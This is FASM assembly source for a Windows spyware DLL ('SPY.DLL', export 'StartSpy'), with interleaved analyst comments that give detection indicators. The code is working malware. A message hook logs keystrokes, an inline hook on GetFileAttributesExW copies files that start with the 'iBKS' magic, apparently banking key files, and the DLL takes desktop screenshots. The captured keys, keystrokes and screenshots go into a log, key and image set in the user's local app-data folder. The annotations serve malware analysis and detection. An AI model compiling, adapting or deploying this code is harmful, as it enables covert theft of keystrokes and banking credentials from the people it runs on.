- ; FASM (flat assembler) source for a 32-bit Windows DLL.  Intel syntax; the
- ; proc/invoke/stdcall macros come from win32a.inc, so every procedure below is
- ; stdcall with an ebp frame.  Analyst note: the leading "- " on each line is a
- ; paste artifact, not part of the source.
- format PE GUI 4.0 DLL
- entry DllEntryPoint                     ; DllMain equivalent, defined below
- include 'win32a.inc'
- include 'encoding/win1251.inc'          ; string literals are encoded as Windows-1251
- HSHELL_WINDOWDESTROYED = 2              ; WH_SHELL hook code; matches the winuser.h value
- ; The section names used in this file (SEX / DRUGS / ROCK / ROLL / NIRVANA /
- ; CASH) are non-standard and are a cheap static-detection artifact for this binary.
- section 'SEX' code readable executable
- ; GdiplusStartupInput (gdiplus.h), 16 bytes.  ScreenShot sets only
- ; GdiplusVersion (to 1) before calling GdiplusStartup; the rest stay zero.
- struct GdiplusStartupInput
- GdiplusVersion dd ?                     ; set to 1 in ScreenShot
- DebugEventCallback dd ?                 ; unused (zero)
- SuppressBackgroundThread dd ?           ; unused (zero)
- SuppressExternalCodecs dd ?             ; unused (zero)
- ends
- ; ImageCodecInfo (gdiplusimaging.h) as returned by GdipGetImageEncoders.
- ; ScreenShot walks an array of these with stride sizeof.ImageCodecInfo and
- ; compares MimeType against encoderMIME; the matching entry's address (which
- ; starts at Clsid) is handed to GdipSaveImageToFile.
- struct ImageCodecInfo
- Clsid dd 4 dup ?                        ; encoder CLSID (16-byte GUID)
- FormatID dd 4 dup ?                     ; format GUID
- CodecName dd ?                          ; WCHAR*
- DllName dd ?                            ; WCHAR*
- FormatDescription dd ?                  ; WCHAR*
- FilenameExtension dd ?                  ; WCHAR*
- MimeType dd ?                           ; WCHAR*, compared with 'image/jpeg' in ScreenShot
- Flags dd ?
- Version dd ?
- SigCount dd ?
- SigSize dd ?
- SigPattern dd ?
- SigMask dd ?
- ends
- ; Layout of the 6-byte inline patch written over the first bytes of a hooked
- ; API by InjectSplicing: `push imm32 ; ret`, i.e. an absolute jump to pushArg.
- ; Hook-integrity checks on kernel32 exports will see exactly this 68 xx xx xx xx C3 prefix.
- struct InjCode
- pushOp db ? ;068h  - PUSH imm32 opcode
- pushArg dd ? ;pFnc - address of the replacement procedure
- retOp db ? ;0c3h  - RET, transfers control to pushArg
- ends
- ;-----------------------------------------------------------------------
- ; size_t StrLen(const char *str)
- ; ABI:   stdcall (fasm proc), 32-bit
- ; In:    [str] = pointer to a NUL-terminated byte string
- ; Out:   ecx = number of bytes before the terminator
- ; Clobb: al, flags (DF cleared).  esi is preserved.
- ;-----------------------------------------------------------------------
- proc StrLen str
-         push    esi
-         mov     esi, DWord [str]
-         xor     ecx, ecx                ; ecx = characters counted so far
-         cld                             ; lodsb walks forward
- .Scan:
-         lodsb
-         test    al, al
-         jz      .Done                   ; hit the terminator
-         inc     ecx
-         jmp     .Scan
- .Done:
-         pop     esi
-         ret
- endp
- ;-----------------------------------------------------------------------
- ; void strreverse(char *str)
- ; ABI:   stdcall (fasm proc), 32-bit
- ; In:    [str] = NUL-terminated byte string, reversed in place
- ; Out:   nothing meaningful; eax/ecx/edx are scratch
- ; Clobb: eax, ecx, edx, flags.  ebx is preserved.
- ; Uses:  StrLen (returns the length in ecx)
- ;-----------------------------------------------------------------------
- proc strreverse str
-         push    ebx
-         mov     eax, [str]              ; eax -> first unswapped character
-         stdcall StrLen, eax             ; ecx = length
-         lea     edx, [eax + ecx - 1]    ; edx -> last unswapped character
-         shr     ecx, 01h                ; ecx = number of swaps to perform
-         jz      .Done                   ; zero- or one-character string
- .Swap:
-         mov     bl, Byte [eax]
-         mov     bh, Byte [edx]
-         mov     Byte [edx], bl
-         mov     Byte [eax], bh
-         inc     eax
-         dec     edx
-         dec     ecx
-         jnz     .Swap
- .Done:
-         pop     ebx
-         ret
- endp
- ;-----------------------------------------------------------------------
- ; void UIntToStrHex(char *outs, unsigned num)
- ; ABI:   stdcall (fasm proc), 32-bit
- ; In:    [outs] = output buffer (needs up to 9 bytes), [num] = value
- ; Out:   [outs] holds num as upper-case hex digits, no leading zeros
- ;        (0 -> "0"), NUL-terminated.
- ; Clobb: eax, ecx, edx, flags.  ebx/edi are preserved.
- ; Uses:  strreverse
- ;-----------------------------------------------------------------------
- proc UIntToStrHex outs, num
-         push    edi
-         mov     edi, DWord [outs]       ; edi = write cursor
-         mov     eax, DWord [num]
- .Digit:
-         mov     edx, eax
-         and     edx, 0fh                ; edx = lowest nibble
-         cmp     dl, 0ah
-         jb      .Decimal
-         add     dl, 07h                 ; skip from '9' to 'A'
- .Decimal:
-         add     dl, 030h                ; '0'
-         mov     Byte [edi], dl          ; digits are emitted least-significant first
-         inc     edi
-         shr     eax, 04h
-         jnz     .Digit
-         mov     Byte [edi], 0h          ; terminate, then put digits in reading order
-         stdcall strreverse, DWord [outs]
-         pop     edi
-         ret
- endp
- ;-----------------------------------------------------------------------
- ; BOOL DllEntryPoint(HINSTANCE hInstDLL, DWORD fdwReason, LPVOID lpvReserved)
- ; On DLL_PROCESS_ATTACH stores the module handle in hInstance, which
- ; InitLogger later passes to SetWindowsHookExW.  Every other reason is a
- ; no-op.  Always returns TRUE.
- ;-----------------------------------------------------------------------
- proc DllEntryPoint hInstDLL, fdwReason, lpvReserved
- cmp [fdwReason],DLL_PROCESS_ATTACH
- jnz .End
- push [hInstDLL]
- pop [hInstance]                         ; hInstance = hInstDLL (memory-to-memory move via the stack)
- .End:
- mov eax, TRUE
- ret
- endp
- ;-----------------------------------------------------------------------
- ; void ScreenShot(const WCHAR *szPath)
- ; Captures the whole primary screen with GDI, encodes it through GDI+ using
- ; the encoder whose MimeType equals encoderMIME ('image/jpeg'), and saves it
- ; to szPath.  GDI+ is started and shut down inside this call.
- ; Clobb: eax, ebx, ecx, edx, esi, edi, flags -- esi/edi/ebx are NOT saved;
- ;        the only caller (NewGetFileAttributesExW) wraps the call in pusha/popa.
- ; Return values of the GDI/GDI+/VirtualAlloc calls are not checked.
- ;-----------------------------------------------------------------------
- proc ScreenShot szPath
- local DesktopDC dd ?
- local hDeskBMP dd ?
- local dcDeskBMP dd ?
- local encNum dd ?                       ; number of installed encoders
- local encSize dd ?                      ; byte size of the ImageCodecInfo array
- local bytesWritten dd ?                 ; unused
- local tGDIP dd ?                        ; GDI+ token
- invoke GetWindowDC,0                    ; DC for the whole screen
- mov DWord [DesktopDC],eax
- invoke GetSystemMetrics, SM_CXSCREEN
- mov esi,eax ;esi - screen width
- invoke GetSystemMetrics, SM_CYSCREEN
- mov edi,eax ;edi - screen height
- invoke CreateCompatibleBitmap, [DesktopDC], esi, edi
- mov dword[hDeskBMP],eax
- invoke CreateCompatibleDC,[DesktopDC]
- mov dword[dcDeskBMP],eax
- invoke SelectObject,[dcDeskBMP],[hDeskBMP]
- invoke BitBlt,[dcDeskBMP],0,0,esi,edi,[DesktopDC],0,0,SRCCOPY   ; copy screen pixels into hDeskBMP
- mov dword[tSI.GdiplusVersion],1
- lea eax, [tGDIP]
- invoke GdiplusStartup, eax, tSI, NULL
- lea eax, [frDesktopBitmap]
- invoke GdipCreateBitmapFromHBITMAP,[hDeskBMP],0,eax   ; frDesktopBitmap = GDI+ wrapper of hDeskBMP
- lea eax, [encNum]
- lea ebx, [encSize]
- invoke GdipGetImageEncodersSize, eax, ebx
- invoke VirtualAlloc,0,[encSize],MEM_COMMIT,PAGE_READWRITE
- mov ebx,eax ;ebx - pointer to encoders info memory
- invoke GdipGetImageEncoders,[encNum],[encSize],eax
- lea ecx,[ebx-sizeof.ImageCodecInfo] ;ecx - current encoder being enumerated (starts one entry before the array; the add below moves to entry 0)
- .Loop:
- add ecx,sizeof.ImageCodecInfo
- push ecx                                ; lstrcmpW may clobber ecx
- invoke lstrcmpW,[ecx+ImageCodecInfo.MimeType],encoderMIME
- pop ecx
- test eax,eax
- jnz .Loop                               ; loop is bounded only by finding a match, not by encNum
- invoke GdipSaveImageToFile,[frDesktopBitmap],[szPath],ecx,NULL   ; ecx -> matching ImageCodecInfo (Clsid first)
- invoke VirtualFree,ebx,0,MEM_RELEASE
- invoke GdipDisposeImage,[frDesktopBitmap]
- invoke GdiplusShutdown,[tGDIP]
- invoke DeleteDC,[dcDeskBMP]
- invoke DeleteObject,[hDeskBMP]
- invoke ReleaseDC,0,[DesktopDC]
- ret
- endp
- ;-----------------------------------------------------------------------
- ; LRESULT MSG_HOOK_PROC(int nCode, WPARAM wParam, LPARAM lParam)
- ; WH_GETMESSAGE hook procedure (installed by InitLogger).  lParam points to
- ; a MSG structure: [+0] hwnd, [+4] message, [+8] wParam.
- ; Behaviour visible here:
- ;   * On the first HC_ACTION call (iSessionState == 0) it runs
- ;     SpyStartSession, remembers the message's hwnd in hWndIBank and sets
- ;     iSessionState = 1.
- ;   * While iSessionState == 1, every WM_CHAR has its character code
- ;     (low 2 bytes of MSG.wParam, i.e. one UTF-16 unit) appended to the
- ;     file handle hLogKbd -- this is the keystroke-capture path.
- ;   * States 2 and 3 (set by SHL_HOOK_PROC) disable logging.
- ; Always chains to CallNextHookEx and returns its result.
- ; Detection: a WH_GETMESSAGE hook whose DLL also writes to a file on each
- ; WM_CHAR is the observable pattern.
- ;-----------------------------------------------------------------------
- proc MSG_HOOK_PROC nCode, wParam, lParam
- local KeyBuff dd ?                      ; holds MSG.wParam; only its low word is written out
- local Res dd ?                          ; WriteFile bytes-written, later CallNextHookEx result
- local Numbers dq ?                      ; unused
- cmp [nCode], HC_ACTION
- jnz .End
- cmp [iSessionState], 03h ;FINISHED SESSION (key file was captured)
- jz .End
- cmp [iSessionState], 02h ;FINISHED SESSION (no key file found)
- jz .End
- cmp [iSessionState], 01h ;SESSION IS ACTIVE
- jz .NextStep
- pusha                                   ; state 0: first message seen -> start the session
- stdcall SpyStartSession
- mov esi, [lParam]
- mov eax, DWord [esi]                    ; MSG.hwnd
- mov [hWndIBank], eax
- mov [iSessionState], 01h
- popa
- .NextStep:
- pusha
- mov esi, [lParam]
- mov eax, DWord [esi+04h]                ; MSG.message
- cmp ax, WM_CHAR
- jnz short .End2
- mov eax, [esi+08h]                      ; MSG.wParam = character code
- mov DWord [KeyBuff], eax
- lea eax, [KeyBuff]
- lea ebx, [Res]
- invoke WriteFile, [hLogKbd], eax, 02h, ebx, NULL   ; append 2 bytes to the .log file
- lea eax, [KeyBuff]
- mov Byte [eax+02h], 0h                  ; NUL after the 2 logged bytes (KeyBuff is not read afterwards)
- .End2:
- popa
- .End:
- pusha
- invoke CallNextHookEx, [hHookMSG], [nCode], [wParam], [lParam]
- mov [Res], eax
- popa
- mov eax, [Res]
- ret
- endp
- ; Restores the 6 original bytes saved in OldCodeBuff over the patched API at
- ; [oldProc], removing the inline hook.  INVALID_HANDLE_VALUE (-1) is
- ; numerically the current-process pseudo-handle, so this patches the caller's
- ; own process.  Note: the iWritten parameter is not referenced in the body;
- ; OldCodeBuff is passed as the bytes-written out-pointer as well.
- ; Used once, in NewGetFileAttributesExW after the target file was copied.
- macro UnhookInjectSplicing oldProc, OldCodeBuff, iWritten {
- pusha
- invoke WriteProcessMemory, INVALID_HANDLE_VALUE, [oldProc], OldCodeBuff, 06h, OldCodeBuff
- popa }
- ;-----------------------------------------------------------------------
- ; BOOL NewGetFileAttributesExW(LPCWSTR lpFileName, GET_FILEEX_INFO_LEVELS
- ;                              fInfoLevelId, LPVOID lpFileInformation)
- ; Replacement installed over kernel32!GetFileAttributesExW by
- ; InjectSplicing (see SpyStartSession).  Flow:
- ;   1. Temporarily writes the saved original bytes (OldCodeFAExPr) back,
- ;      re-pushes the three arguments plus .NextStep as return address and
- ;      jumps to the real function, so it returns into .NextStep.
- ;   2. Re-applies the patch (InjCodeFAExWPr), then opens lpFileName itself:
- ;      if the file is <= 04000h bytes and its first 4 bytes equal iBKS
- ;      ("iBKS"), the whole file is copied into a LocalAlloc'd buffer
- ;      (pBuffKey / KeySize), a screenshot is saved as <szPathLog>.jpg, and
- ;      the hook is removed (UnhookInjectSplicing).
- ;   3. Restores the caller's last-error value and returns.
- ; The hook operates on the hooked process's own memory (INVALID_HANDLE_VALUE
- ; == current-process pseudo-handle).  Detection: WriteProcessMemory with
- ; the self pseudo-handle targeting a kernel32 export, or a 68 xx xx xx xx C3
- ; prefix on GetFileAttributesExW, plus an unexpected open/read of the
- ; queried file from within the same call.
- ;-----------------------------------------------------------------------
- proc NewGetFileAttributesExW lpFileName, fInfoLevelId, lpFileInformation
- local Buff dd ?                         ; first 4 bytes of the file (signature check)
- local iRead dd ?
- local lastErr dd ?
- push [lpFileInformation]                ; re-create the stdcall argument list for the real function
- push [fInfoLevelId]
- push [lpFileName]
- push .NextStep                          ; its `ret` will land at .NextStep
- pusha
- invoke WriteProcessMemory, INVALID_HANDLE_VALUE, [GetFileAttributesExW], OldCodeFAExPr, 06h, iWritten   ; unpatch
- popa
- jmp [GetFileAttributesExW]              ; run the original
- .NextStep:
- invoke GetLastError                     ; preserve the original's error state across the extra work below
- mov [lastErr], eax
- pusha
- invoke WriteProcessMemory, INVALID_HANDLE_VALUE, [GetFileAttributesExW], InjCodeFAExWPr, 06h, iWritten   ; re-patch
- invoke CreateFileW, [lpFileName], GENERIC_READ, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL
- cmp eax, INVALID_HANDLE_VALUE
- jz .End
- mov esi, eax ; hFile
- invoke GetFileSize, esi, NULL
- cmp eax, 04000h                         ; only files up to 16 KiB are considered
- ja .CloseHandle
- mov [KeySize], eax
- lea edx, [Buff]
- lea edi, [iRead]
- invoke ReadFile, esi, edx, 04h, edi, NULL
- cmp DWord [iRead], 04h
- jnz .CloseHandle
- mov eax, DWord [iBKS]                   ; 4-byte magic "iBKS"
- cmp eax, [Buff]
- jnz .CloseHandle
- invoke LocalAlloc, GMEM_ZEROINIT or GMEM_FIXED, [KeySize]
- mov [pBuffKey], eax
- invoke SetFilePointer, esi, NULL, NULL, FILE_BEGIN
- lea edi, [iRead]
- invoke ReadFile, esi, [pBuffKey], [KeySize], edi, NULL   ; whole file into pBuffKey
- mov eax, [iLenPath]
- shl eax, 01h                            ; WCHAR count -> bytes
- add eax, 014h                           ; room for ".jpg" and terminator
- invoke LocalAlloc, GMEM_ZEROINIT or GMEM_FIXED, eax
- mov ebx, eax
- invoke lstrcat, ebx, szPathLog          ; <session path>.jpg
- invoke lstrcat, ebx, szJPG
- stdcall ScreenShot, ebx
- invoke LocalFree, ebx
- UnhookInjectSplicing GetFileAttributesExW, OldCodeFAExPr, iWritten   ; one-shot: hook removed after capture
- .CloseHandle:
- invoke CloseHandle, esi
- .End:
- invoke SetLastError, [lastErr]
- popa
- ret
- endp
- ;-----------------------------------------------------------------------
- ; void InjectSplicing(void *newProc, void *oldProc,
- ;                     InjCode *InjCodeBuff, BYTE OldCodeBuff[6])
- ; Installs a 6-byte inline hook on oldProc in the current process:
- ; builds `push newProc ; ret` in InjCodeBuff, saves the first 6 bytes of
- ; oldProc into OldCodeBuff (ReadProcessMemory), then overwrites them with
- ; the stub (WriteProcessMemory).  All registers are preserved (pusha/popa).
- ; Result of either memory call is not checked.  Called once from
- ; SpyStartSession for GetFileAttributesExW.
- ;-----------------------------------------------------------------------
- proc InjectSplicing newProc, oldProc, InjCodeBuff, OldCodeBuff
- local Bytes dd ?
- pusha
- mov eax, [newProc]
- mov edx, [InjCodeBuff]
- mov Byte [edx+InjCode.pushOp], 068h     ; PUSH imm32
- mov DWord [edx+InjCode.pushArg], eax    ; imm32 = newProc
- mov Byte [edx+InjCode.retOp], 0c3h      ; RET
- mov ebx, [oldProc]
- lea edx, [Bytes]
- invoke ReadProcessMemory, INVALID_HANDLE_VALUE, ebx, [OldCodeBuff], 06h, edx   ; save original prologue bytes
- lea edx, [Bytes]
- invoke WriteProcessMemory, INVALID_HANDLE_VALUE, ebx, [InjCodeBuff], 06h, edx  ; write the stub over them
- popa
- ret
- endp
- ;-----------------------------------------------------------------------
- ; void SpyStartSession(void)
- ; Runs once from MSG_HOOK_PROC when logging starts.  Builds the session
- ; path  %LOCALAPPDATA%\<16 hex digits of the current FILETIME>  in
- ; szPathLog, creates <that path>.log as the keystroke log (hLogKbd), and
- ; installs the GetFileAttributesExW inline hook.  All registers preserved.
- ; Artefacts for hunting: a .log / .key / .jpg triple in %LOCALAPPDATA%
- ; whose base name is a 16-digit hex FILETIME.
- ;-----------------------------------------------------------------------
- proc SpyStartSession
- local hWnd dd ?                         ; unused
- local sTitle db 040h dup(?)             ; unused
- local FT dq ?                           ; FILETIME used as the session id
- pusha
- invoke SHGetFolderPath, NULL, CSIDL_LOCAL_APPDATA, NULL, 0h, szPathLog
- lea eax, [FT]
- invoke GetSystemTimeAsFileTime, eax
- mov eax, DWord [FT]
- stdcall UIntToStrHex, szSessionASCII, DWord [FT]          ; low dword -> first 8 hex chars
- stdcall UIntToStrHex, szSessionASCII+08h, DWord [FT+04h]  ; high dword -> next 8 (overwrites the first NUL)
- invoke OemToCharW, szSessionASCII, szSessionUnicode       ; ASCII id -> UTF-16
- invoke lstrcat, szPathLog, szPathSession ; appears to rely on szPathSession and szSessionUnicode being contiguous, so one lstrcatW appends "\" + session id
- invoke lstrlen, szPathLog
- mov [iLenPath], eax                     ; WCHAR count of the session path, reused for later allocations
- shl eax, 01h                            ; -> bytes
- add eax, 05h
- invoke LocalAlloc, GMEM_ZEROINIT or GMEM_FIXED, eax
- mov ebx, eax
- invoke lstrcat, ebx, szPathLog
- invoke lstrcat, ebx, szLOG              ; <session path>.log
- invoke CreateFileW, ebx, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0h
- cmp eax, -1h                            ; INVALID_HANDLE_VALUE
- jz .FreeMem
- mov [hLogKbd], eax
- stdcall InjectSplicing, NewGetFileAttributesExW, [GetFileAttributesExW], InjCodeFAExWPr, OldCodeFAExPr
- .FreeMem:
- invoke LocalFree, ebx
- popa
- ret
- endp
- ;-----------------------------------------------------------------------
- ; LRESULT SHL_HOOK_PROC(int nCode, WPARAM wParam, LPARAM lParam)
- ; WH_SHELL hook procedure (installed by InitLogger).  On any
- ; HSHELL_WINDOWDESTROYED notification (the window handle in wParam is not
- ; inspected) it ends the session: closes the keystroke log, and if
- ; NewGetFileAttributesExW captured a file (KeySize != 0) writes the buffered
- ; contents to <session path>.key and sets iSessionState = 3, otherwise sets
- ; iSessionState = 2; then removes both hooks.  Returns 0 without calling
- ; CallNextHookEx.  All registers preserved.
- ;-----------------------------------------------------------------------
- proc SHL_HOOK_PROC nCode, wParam, lParam
- local szBuff db 040h dup (?)            ; unused
- pusha
- cmp DWORD [nCode], HSHELL_WINDOWDESTROYED
- jnz .End
- invoke CloseHandle, [hLogKbd]
- cmp [KeySize], 0
- jz .FileKeyNotFound
- invoke LocalAlloc, GMEM_ZEROINIT or GMEM_FIXED, 600   ; 600 bytes for the path; not derived from iLenPath
- mov ebx, eax
- invoke lstrcat, ebx, szPathLog
- invoke lstrcat, ebx, szKEY              ; <session path>.key
- invoke CreateFileW, ebx, GENERIC_WRITE, 0, 0, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0h
- mov edi, eax                            ; handle not validated before use
- invoke WriteFile, edi, [pBuffKey], [KeySize], iWritten, NULL
- invoke CloseHandle, edi
- invoke LocalFree, ebx
- mov [iSessionState], 03h                ; finished, key file written
- jmp short .End2
- .FileKeyNotFound:
- mov [iSessionState], 02h                ; finished, nothing captured
- .End2:
- invoke UnhookWindowsHookEx, [hHookMSG]
- invoke UnhookWindowsHookEx, [hHookSHL]
- .End:
- popa
- xor eax, eax
- ret
- endp
- ;-----------------------------------------------------------------------
- ; DWORD InitLogger(DWORD TID)   -- exported as 'StartSpy'
- ; Installs the WH_GETMESSAGE and WH_SHELL hooks for thread TID using this
- ; DLL's module handle (hInstance, set in DllEntryPoint); handles are kept
- ; in the shareable data section so the hook procedures can unhook later.
- ; Return values of SetWindowsHookExW are not checked.  Returns 0.
- ; Detection: SetWindowsHookExW calls with WH_GETMESSAGE/WH_SHELL from a
- ; module exporting 'StartSpy'.
- ;-----------------------------------------------------------------------
- proc InitLogger TID
- pusha
- invoke SetWindowsHookExW, WH_GETMESSAGE, MSG_HOOK_PROC, [hInstance], [TID]
- mov [hHookMSG], eax
- invoke SetWindowsHookExW, WH_SHELL, SHL_HOOK_PROC, [hInstance], [TID]
- mov [hHookSHL], eax
- popa
- xor eax, eax
- ret
- endp
- ; DWORD GetSpyState(void) -- exported.  Returns iSessionState:
- ; 0 = idle, 1 = logging, 2 = finished without a key file, 3 = finished with one.
- proc GetSpyState
- mov eax, [iSessionState]
- ret
- endp
- ; const WCHAR *GetSpySessionPath(void) -- exported.  Returns the address of
- ; szPathLog (the session base path, without the .log/.key/.jpg suffix).
- proc GetSpySessionPath
- lea eax, [szPathLog]
- ret
- endp
- ; Shared data: `shareable` maps one copy of this section into every process
- ; that loads the DLL, so the hook state written inside a hooked process is
- ; visible to the process that called StartSpy / GetSpyState.
- section 'DRUGS' data readable writeable shareable
- hHookMSG dd 0h                          ; WH_GETMESSAGE hook handle
- hHookSHL dd 0h                          ; WH_SHELL hook handle
- hWndIBank dd 0h                         ; hwnd of the first message seen (set in MSG_HOOK_PROC, not read here)
- iSessionState dd 0h                     ; 0 idle, 1 logging, 2 finished (no key), 3 finished (key written)
- szPathLog db 0100h dup (0h)             ; UTF-16 session base path (256 bytes = 128 WCHARs)
- KeySize dd 0h                           ; byte length of the captured file, 0 if none
- ; Per-process data (not shared).
- section 'ROCK' data readable writeable
- hInstance dd 0h                         ; module handle from DllEntryPoint
- hLogKbd dd ?                            ; handle of <session>.log
- szBuff db 09h dup(0)                    ; unused
- szLOG du '.log', 0                      ; UTF-16 suffixes appended with lstrcatW
- szKEY du '.key', 0
- szJPG du '.jpg', 0
- InjCodeFAExWPr db 06 dup (?)            ; 6-byte push/ret stub (InjCode layout)
- OldCodeFAExPr db 06 dup (?)             ; original first 6 bytes of GetFileAttributesExW
- iWritten dd 0h                          ; bytes-written scratch for WriteProcessMemory / WriteFile
- iBKS db 069h, 042h, 04bh, 053h          ; "iBKS" -- 4-byte magic a file must start with to be captured
- iLenPath dd 0h                          ; WCHAR length of szPathLog after SpyStartSession
- pBuffKey dd 0h                          ; LocalAlloc'd copy of the captured file
- szSessionASCII db 012h dup(0h)          ; 16 hex digits of the session FILETIME + NUL
- szPathSession db '\',0h                 ; bytes 5C 00: read as a wide string this is L"\" followed directly by ...
- szSessionUnicode dw 012h dup(0h)        ; ... the UTF-16 session id, so lstrcatW(szPathLog, szPathSession) appends both
- frDesktopBitmap dd ?                    ; GDI+ image handle used by ScreenShot
- fPath du 'Bitmap.jpg',0                 ; unused
- encoderMIME du 'image/jpeg',0           ; encoder selected in ScreenShot
- tSI GdiplusStartupInput <>
- GUIDImageEncoderBMP:                    ; unused; a GUID written out as dd/dw/db
- dd 557CF400h
- dw 1A04h,11D3h
- db 09Ah,073h,000h,000h,0F8h,01Eh,0F3h,02Eh
- ; Import table.  Several entries below are never referenced in this file
- ; (e.g. Sleep, VirtualProtect, ToUnicode, MessageBox*, CreateFileA); the
- ; import list is therefore a broader indicator than the code actually uses.
- ; Note the un-suffixed aliases resolve to the W variants: lstrcat -> lstrcatW,
- ; lstrlen -> lstrlenW, lstrcpy -> lstrcpyW, SHGetFolderPath -> SHGetFolderPathW.
- section 'ROLL' import data readable writeable
- library kernel, 'kernel32.DLL',\
- user, 'user32.DLL',\
- shell, 'shell32.DLL',\
- gdiplus, 'gdiplus.dll',\
- gdi32, 'gdi32.dll'
- ; kernel32: file I/O, self-process memory patching (Read/WriteProcessMemory), allocation.
- import kernel,\
- GetSystemDirectory, 'GetSystemDirectoryA',\
- GetCommandLineW, 'GetCommandLineW',\
- lstrcpy, 'lstrcpyW',\
- lstrcmp, 'lstrcmpA',\
- lstrcmpi, 'lstrcmpiA',\
- lstrcmpW, 'lstrcmpW',\
- lstrcat, 'lstrcatW',\
- lstrlen, 'lstrlenW',\
- Sleep, 'Sleep',\
- ReadProcessMemory, 'ReadProcessMemory',\
- WriteProcessMemory,'WriteProcessMemory',\
- GetStartupInfo, 'GetStartupInfo',\
- GetSystemTimeAsFileTime, 'GetSystemTimeAsFileTime',\
- CreateFileW, 'CreateFileW',\
- CreateFileA, 'CreateFileA',\
- GetLastError, 'GetLastError',\
- GetFileSize, 'GetFileSize',\
- LocalFree, 'LocalFree',\
- VirtualAlloc, 'VirtualAlloc',\
- SetLastError, 'SetLastError',\
- SetFilePointer, 'SetFilePointer',\
- WriteFile, 'WriteFile',\
- ReadFile, 'ReadFile',\
- CloseHandle, 'CloseHandle',\
- SetEndOfFile, 'SetEndOfFile',\
- VirtualProtect, 'VirtualProtect',\
- GetFileAttributesExA, 'GetFileAttributesExA',\
- GetFileAttributesExW, 'GetFileAttributesExW',\
- LocalAlloc, 'LocalAlloc',\
- VirtualFree, 'VirtualFree',\
- ExitProcess,'ExitProcess'
- ; user32: hook installation (SetWindowsHookExW WH_GETMESSAGE / WH_SHELL) and screen DCs.
- import user,\
- MessageBoxA, 'MessageBoxA',\
- MessageBoxW, 'MessageBoxW',\
- OemToCharW, 'OemToCharW',\
- GetDC, 'GetDC',\
- GetDeviceCaps, 'GetDeviceCaps',\
- GetSystemMetrics, 'GetSystemMetrics',\
- GetWindowDC, 'GetWindowDC',\
- ReleaseDC, 'ReleaseDC',\
- SetWindowsHookExW, 'SetWindowsHookExW',\
- CallNextHookEx, 'CallNextHookEx',\
- UnhookWindowsHookEx, 'UnhookWindowsHookEx',\
- ToUnicode, 'ToUnicode',\
- GetWindowLong, 'GetWindowLongA',\
- GetWindowThreadProcessId, 'GetWindowThreadProcessId',\
- GetClassNameA, 'GetClassNameA'
- ; shell32: %LOCALAPPDATA% lookup for the drop location.
- import shell,\
- SHGetFolderPath, 'SHGetFolderPathW'
- ; gdiplus: JPEG encoding of the screenshot.
- import gdiplus,\
- GdipCreateBitmapFromHBITMAP,'GdipCreateBitmapFromHBITMAP',\
- GdipDisposeImage,'GdipDisposeImage',\
- GdiplusStartup,'GdiplusStartup',\
- GdiplusShutdown,'GdiplusShutdown',\
- GdipSaveImageToFile,'GdipSaveImageToFile',\
- GdipGetImageEncodersSize,'GdipGetImageEncodersSize',\
- GdipGetImageEncoders,'GdipGetImageEncoders'
- ; gdi32: screen capture via BitBlt into a compatible bitmap.
- import gdi32,\
- CreateCompatibleDC,'CreateCompatibleDC',\
- DeleteDC,'DeleteDC',\
- CreateCompatibleBitmap,'CreateCompatibleBitmap',\
- DeleteObject,'DeleteObject',\
- SelectObject,'SelectObject',\
- BitBlt,'BitBlt'
- ; Export table.  The internal DLL name 'SPY.DLL' and the export 'StartSpy'
- ; (InitLogger) are the most direct static indicators in this binary.
- section 'NIRVANA' export data readable
- export 'SPY.DLL',\
- InitLogger, 'StartSpy',\
- GetSpyState, 'GetSpyState',\
- GetSpySessionPath, 'GetSpySessionPath'
- ; Base relocations -- required because a hook DLL is mapped into other
- ; processes and may not land at its preferred base.
- section 'CASH' fixups data discardable